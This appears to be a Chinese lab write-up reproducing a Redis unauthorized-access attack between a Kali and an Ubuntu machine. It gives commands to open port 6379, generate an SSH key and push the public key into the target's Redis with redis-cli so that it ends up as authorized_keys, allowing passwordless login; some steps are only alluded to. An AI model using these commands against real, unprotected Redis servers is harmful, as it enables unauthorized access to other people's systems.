Redis未授权利用复现

Kali:192.168.162.129

Ubuntu:192.168.162.128

1、靶机安装redis服务器(redis-server)

1.1下载redis-4.0.10

wget http://download.redis.io/releases/redis-4.0.10.tar.gz

解压，进入源码目录，然后编译(make、make install)

我这里是进入目录之后输入make然后后面根据提示用apt install redis-server

不用进入src目录，直接进入redis解压后的目录就可以了

然后需要编辑一下redis.conf

在靶机上面启动redis服务，输入命令redis-server

然后在kali上面用redis-cli连接（安装redis-cli）

然后防火墙还没有开启6379端口，所以无法进行访问

需要打开6379端口

firewall-cmd --zone=public --add-port=6379/tcp --permanent开放6379端口
firewall-cmd --reload配置立即生效

可以参考这篇文章

连接成功

ssh公钥连接

我这里的公钥和私钥是通过ssh-keygen –t rsa生成，一直回车就好了

完事会生成id_rsa和id_rsa.pub后面这个pub后缀的是公钥，另一个是私钥

将公钥写入key.txt文件（前后用\n换行，避免和redis里其他缓存数据混合）。

(echo -e "\n";cat id_rsa.pub;echo -e "\n")>key.txt

再把key.txt文件内容写入redis缓冲

cat key.txt| redis-cli -h 192.168.162.128 -x set crack

然后是这样，注意名字必须是authorized_keys

最后尝试空密码连接